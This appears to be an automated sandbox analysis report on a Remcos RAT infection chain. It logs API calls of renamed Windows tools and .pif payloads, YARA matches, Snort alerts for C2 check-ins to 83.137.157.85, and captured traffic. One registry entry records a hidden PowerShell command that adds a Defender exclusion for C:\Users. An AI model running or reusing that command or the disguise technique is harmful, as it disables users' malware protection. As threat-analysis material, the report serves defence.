Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEAC450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore, 25_2_00007FF67DEAC450
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE54410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DE54410
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE723E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer, 25_2_00007FF67DE723E8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF08298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove, 25_2_00007FF67DF08298
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5E3B0 #357,#357,CryptDecodeObject,LocalFree, 25_2_00007FF67DE5E3B0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF3A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject, 25_2_00007FF67DF3A2E0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror, 25_2_00007FF67DEC6374
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext, 25_2_00007FF67DEC2358
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA23837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 28_2_1BA23837
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21093837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 36_2_21093837
Source: sppsvc.pif, 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_1f2c415d-a

Exploits

Source: Yara match File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210674FD _wcslen,CoGetObject, 36_2_210674FD
Source: C:\Users\Public\ger.exe Registry value created: NULL C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users Jump to behavior
Source: unknown HTTPS traffic detected: 23.35.153.42:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.217.193:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
Source: Binary string: easinvoker.pdbH source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: reg.pdb source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
Source: Binary string: powershell.pdb source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source: Binary string: reg.pdbGCTL source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 4_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 4_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 4_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 4_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose, 4_2_00007FF789BE7B4C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 6_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 6_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 6_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 6_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose, 6_2_00007FF789BE7B4C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose, 25_2_00007FF67DEB5E58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF119F8 #359,FindFirstFileW,FindNextFileW,FindClose, 25_2_00007FF67DF119F8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose, 25_2_00007FF67DEBDBC0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF11B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359, 25_2_00007FF67DF11B04
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359, 25_2_00007FF67DEF3674
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle, 25_2_00007FF67DEBD4A4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE7D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DE7D440
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357, 25_2_00007FF67DEBB3D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF16F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357, 25_2_00007FF67DF16F80
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF110C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357, 25_2_00007FF67DF110C4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF13100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357, 25_2_00007FF67DF13100
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEAC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree, 25_2_00007FF67DEAC6F8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF1234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose, 25_2_00007FF67DF1234C
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9FBB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 28_2_1B9FBB30
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9FC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 28_2_1B9FC34D
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA0C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 28_2_1BA0C291
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA09AF5 FindFirstFileW, 28_2_1BA09AF5
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9F880C FindFirstFileW,FindNextFileW,FindClose, 28_2_1B9F880C
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9F783C FindFirstFileW,FindNextFileW, 28_2_1B9F783C
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9F9665 FindFirstFileW,FindNextFileW,FindClose,FindClose, 28_2_1B9F9665
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9FBD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 28_2_1B9FBD37
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA3E879 FindFirstFileExA, 28_2_1BA3E879
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 29_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 29_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 29_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 29_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose, 29_2_00007FF789BE7B4C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_029A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 36_2_029A5878
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2106C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 36_2_2106C34D
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21069253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 36_2_21069253
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2107C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 36_2_2107C291
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21069665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 36_2_21069665
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2106880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 36_2_2106880C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2106783C FindFirstFileW,FindNextFileW, 36_2_2106783C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210AE879 FindFirstFileExA, 36_2_210AE879
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2106BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 36_2_2106BB30
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21079AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 36_2_21079AF5
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2106BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 36_2_2106BD37
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21067C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 36_2_21067C97

Networking

Source: Traffic Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49730 -> 83.137.157.85:9231
Source: Traffic Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 83.137.157.85:9231 -> 192.168.2.5:49730
Source: Malware configuration extractor URLs: ^www.pentegrasystem.com
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028AC78C InternetCheckConnectionA, 28_2_028AC78C
Source: global traffic TCP traffic: 192.168.2.5:49730 -> 83.137.157.85:9231
Source: global traffic HTTP traffic detected: GET /api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/1.1Accept-Encoding: gzip, deflateHost: cxcs.microsoft.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 239.255.255.250
Source: Joe Sandbox View IP Address: 178.237.33.50
Source: Joe Sandbox View ASN Name: INVITECHHU
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.153.42
Source: unknown TCP traffic detected without corresponding DNS query: 23.204.76.112
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9F4B96 WaitForSingleObject,SetEvent,recv, 28_2_1B9F4B96
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGNCNsLEGIjCLPFnVdLGYjtbKIHiASmHBA5O7_cfgfeKSfVG961wW18u4XGlNJfozYzsMBcrzcRwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-19; NID=513=dIEywckpmnBKntp2GElYlpvANdg1GQg9WS73nz-f5glf4IBfUl3eMpZgnnmShpr9iJ8zBJZaj0vDbSmMSmPVIAAqShn63hvugGyDDhjdWhTmo6-iPW_P22G1Soq0NtFRvrRQtxSQbMFi5XmOtW4IBgt7x104_UZ5eznyt1erQT0
